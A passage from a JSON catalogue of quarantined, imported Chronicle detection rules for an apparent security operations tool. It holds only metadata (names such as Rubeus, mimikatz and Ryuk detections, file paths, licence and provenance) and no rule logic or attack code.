"type": "detection", "name": "registry_persistence_via_explorer_run_key", "description": "registry_persistence_via_explorer_run_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/registry-persistence-via-explorer-run-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "registry_persistence_via_explorer_run_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/registry_persistence_via_explorer_run_key.yaral" } }, { "id": "chronicle-detection-rules-remote-access-to-ssh-ftp-sftp-applications", "type": "detection", "name": "remote_access_to_ssh_ftp_sftp_applications", "description": "remote_access_to_ssh_ftp_sftp_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-access-to-ssh-ftp-sftp-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_access_to_ssh_ftp_sftp_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/remote_access_to_ssh__ftp__sftp_applications.yaral" } }, { "id": "chronicle-detection-rules-remote-desktop-from-internet-via-audit", "type": "detection", "name": "remote_desktop_from_internet_via_audit", "description": "remote_desktop_from_internet_via_audit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-desktop-from-internet-via-audit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_desktop_from_internet_via_audit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/security/remote_desktop_from_internet__via_audit.yaral" } }, { "id": "chronicle-detection-rules-remote-execution-via-sql-extended-stored-procedure-xp-cmdshell", "type": "detection", "name": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "description": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-execution-via-sql-extended-stored-procedure-xp-cmdshell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_execution_via_sql_extended_stored_procedure_xp_cmdshell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/remote_execution_via_sql_extended_stored_procedure_xp_cmdshell.yaral" } }, { "id": "chronicle-detection-rules-remote-system-discovery-ping-sweep", "type": "detection", "name": "remote_system_discovery__ping_sweep", "description": "remote_system_discovery__ping_sweep", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/remote-system-discovery-ping-sweep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "remote_system_discovery__ping_sweep", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/remote_system_discovery___ping_sweep.yaral" } }, { "id": "chronicle-detection-rules-renamed-binary", "type": "detection", "name": "renamed_binary", "description": "renamed_binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_binary", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/renamed_binary.yaral" } }, { "id": "chronicle-detection-rules-renamed-createdump-utility-execution", "type": "detection", "name": "renamed_createdump_utility_execution", "description": "renamed_createdump_utility_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-createdump-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_createdump_utility_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/renamed_createdump_utility_execution.yaral" } }, { "id": "chronicle-detection-rules-renamed-powershell", "type": "detection", "name": "renamed_powershell", "description": "renamed_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/renamed_powershell.yaral" } }, { "id": "chronicle-detection-rules-renamed-powershellexe", "type": "detection", "name": "renamed_powershellexe", "description": "renamed_powershellexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-powershellexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_powershellexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/renamed_powershell_exe.yaral" } }, { "id": "chronicle-detection-rules-renamed-psexec", "type": "detection", "name": "renamed_psexec", "description": "renamed_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/renamed_psexec.yaral" } }, { "id": "chronicle-detection-rules-renamed-zoho-dctask64", "type": "detection", "name": "renamed_zoho_dctask64", "description": "renamed_zoho_dctask64", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/renamed-zoho-dctask64.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "renamed_zoho_dctask64", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/renamed_zoho_dctask64.yaral" } }, { "id": "chronicle-detection-rules-restrictedadminmode-registry-value-tampering", "type": "detection", "name": "restrictedadminmode_registry_value_tampering", "description": "restrictedadminmode_registry_value_tampering", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/restrictedadminmode-registry-value-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "restrictedadminmode_registry_value_tampering", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/restrictedadminmode_registry_value_tampering.yaral" } }, { "id": "chronicle-detection-rules-rid-hijacking", "type": "detection", "name": "rid_hijacking", "description": "rid_hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rid-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rid_hijacking", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rid_hijacking.yaral" } }, { "id": "chronicle-detection-rules-rig-ek-delivers-predator-the-thiefbot-ransomware", "type": "detection", "name": "rig_ek_delivers_predator_the_thiefbot_ransomware", "description": "rig_ek_delivers_predator_the_thiefbot_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rig-ek-delivers-predator-the-thiefbot-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rig_ek_delivers_predator_the_thiefbot_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/rig_ek_delivers_predator_the_thief_bot_ransomware.yaral" } }, { "id": "chronicle-detection-rules-roma225-campaign-firewallproxy", "type": "detection", "name": "roma225_campaign_firewallproxy", "description": "roma225_campaign_firewallproxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/roma225-campaign-firewallproxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "roma225_campaign_firewallproxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/roma225_campaign__firewall_proxy.yaral" } }, { "id": "chronicle-detection-rules-roma225-campaign-sysmon", "type": "detection", "name": "roma225_campaign_sysmon", "description": "roma225_campaign_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/roma225-campaign-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "roma225_campaign_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/roma225_campaign__sysmon.yaral" } }, { "id": "chronicle-detection-rules-rottenpotato-like-attack-pattern", "type": "detection", "name": "rottenpotato_like_attack_pattern", "description": "rottenpotato_like_attack_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rottenpotato-like-attack-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rottenpotato_like_attack_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rottenpotato_like_attack_pattern.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool", "type": "detection", "name": "rubeus_hack_tool", "description": "rubeus_hack_tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/rubeus_hack_tool.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool-sysmon", "type": "detection", "name": "rubeus_hack_tool_sysmon", "description": "rubeus_hack_tool_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rubeus_hack_tool__sysmon.yaral" } }, { "id": "chronicle-detection-rules-rubeus-hack-tool-windows-security", "type": "detection", "name": "rubeus_hack_tool_windows_security", "description": "rubeus_hack_tool_windows_security", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rubeus-hack-tool-windows-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rubeus_hack_tool_windows_security", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rubeus_hack_tool__windows_security.yaral" } }, { "id": "chronicle-detection-rules-rundll32-internet-connection", "type": "detection", "name": "rundll32_internet_connection", "description": "rundll32_internet_connection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rundll32-internet-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rundll32_internet_connection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rundll32_internet_connection.yaral" } }, { "id": "chronicle-detection-rules-rw-mimikatz-t1003", "type": "detection", "name": "rw_mimikatz_T1003", "description": "rw_mimikatz_T1003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-mimikatz-t1003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_mimikatz_T1003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_mimikatz_T1003.yaral" } }, { "id": "chronicle-detection-rules-rw-utilities-associated-with-ntdsdit-t1003-003", "type": "detection", "name": "rw_utilities_associated_with_ntdsdit_T1003_003", "description": "rw_utilities_associated_with_ntdsdit_T1003_003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-utilities-associated-with-ntdsdit-t1003-003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_utilities_associated_with_ntdsdit_T1003_003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_utilities_associated_with_ntdsdit_T1003_003.yaral" } }, { "id": "chronicle-detection-rules-rw-windows-password-spray-t1110-003", "type": "detection", "name": "rw_windows_password_spray_T1110_003", "description": "rw_windows_password_spray_T1110_003", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rw-windows-password-spray-t1110-003.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rw_windows_password_spray_T1110_003", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rw_windows_password_spray_T1110_003.yaral" } }, { "id": "chronicle-detection-rules-ryuk-encryption-and-evasion-techniques", "type": "detection", "name": "ryuk_encryption_and_evasion_techniques", "description": "ryuk_encryption_and_evasion_techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-encryption-and-evasion-techniques.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_encryption_and_evasion_techniques", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_encryption_and_evasion_techniques.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware", "type": "detection", "name": "ryuk_ransomware", "description": "ryuk_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/ryuk_ransomware.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-detector-sysmon-behavior", "type": "detection", "name": "ryuk_ransomware_detector_sysmon_behavior", "description": "ryuk_ransomware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/ryuk_ransomware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-hash-detected", "type": "detection", "name": "ryuk_ransomware_hash_detected", "description": "ryuk_ransomware_hash_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-hash-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_hash_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ryuk_ransomware_hash_detected.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-persistence-mechanism-detection", "type": "detection", "name": "ryuk_ransomware_persistence_mechanism_detection", "description": "ryuk_ransomware_persistence_mechanism_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-persistence-mechanism-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_persistence_mechanism_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ryuk_ransomware_persistence_mechanism_detection.yaral" } }, { "id": "chronicle-detection-rules-ryuk-ransomware-sysmon", "type": "detection", "name": "ryuk_ransomware_sysmon", "description": "ryuk_ransomware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-ransomware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_ransomware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_ransomware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-ryuk-sample-sysmon-behavior", "type": "detection", "name": "ryuk_sample__sysmon_behavior", "description": "ryuk_sample__sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ryuk-sample-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ryuk_sample__sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_sample___sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-safebrowsing-process-creation-hashes-seen-more-than-7-days", "type": "detection", "name": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "description": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/safebrowsing-process-creation-hashes-seen-more-than-7-days.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/safebrowsing_process_creation_hashes_seen_more_than_7_days.yaral" } }, { "id": "chronicle-detection-rules-sans-posterknown-normalfind-evil-sysmon-behaviour", "type": "detection", "name": "sans_posterknown_normalfind_evil__sysmon_behaviour", "description": "sans_posterknown_normalfind_evil__sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sans-posterknown-normalfind-evil-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sans_posterknown_normalfind_evil__sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sans_poster_known_normal___find_evil___sysmon_behaviour.yaral" } }, { "id": "chronicle-detection-rules-sap-break-glass-account-login", "type": "detection", "name": "sap_break_glass_account_login", "description": "sap_break_glass_account_login", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-break-glass-account-login.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 